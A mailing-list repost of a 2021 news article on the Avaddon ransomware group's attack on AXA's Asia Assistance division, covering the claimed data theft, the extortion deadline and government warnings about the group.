[BreachExchange] After dropping support for ransom payments, AXA struck by ransomware in Asia

[Destry Winant]

https://siliconangle.com/2021/05/16/dropping-support-ransom-payments-axa-struck-ransomware-asia/

French multinational insurance firm AXA S.A. has been struck by a
ransomware attack after the company announced May 9 that it would stop
paying for ransomware crime payments.

Reuters reported the company said today that one of its Asia Assistance
divisions had been targeted and that information technology services were
affected in Thailand, Malaysia, Hong Kong and the Philippines. “As a
result, certain data processed by Inter Partners Asia (IPA) in Thailand has
been accessed,” AXA noted.

According to Hackread, the Avaddon ransomware group was behind the attack
and is claiming responsibility on its dark web site. The group claims to
have stolen 3 terabytes of data, including a long list of information: ID
cards, passport copies, customer claims, reserved agreements, denied
reimbursements, payments to customers, contract and reports, customer IDs
and bank account scanned papers, hospital and doctor reserved material
(private investigation for fraud) and customer medical reports including
HIV, hepatitis, STD and other illness reports.

Avaddon provided copies of two passports as evidence, one Thai and the
other from the U.K.

The ransom being demanded was not disclosed. The ransomware group said AXA
has 240 hours to communicate and cooperate, otherwise it will leak valuable
company documents.

The attack by Avaddon comes just under a week since both the U.S. Federal
Bureau of Investigation and the Australian Cyber Security Centre issued
warnings that an Avaddon campaign was targeting organizations worldwide.
The FBI said that Avaddon ransomware affiliates are trying to breach the
networks of manufacturing, healthcare and other private sector
organizations, while the ACSC said that the targets included government,
finance, law enforcement, energy, information technology and health.

“In addition to encryption of data, victims are threatened with the
publication of stolen data, as well as Distributed Denial of Service
against their network,” the ACSC added.

Avaddon dates to around June last year and was first detailed in July by
Trend Micro Inc. Avaddon ransomware attacks are typically propagated
through emails with a JavaScript attachment. Once the attachment is
downloaded and run, it users a PowerShell command and the BITSAdmin
command-line tool to download and run the ransomware payload.

At this point, users have their wallpaper changed to an image that states
that “all your files have been encrypted” and told to read a ransomware
note. The note provide instructions on how the affected users can recover
their encrypted files.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20210518/5de411d0/attachment.html>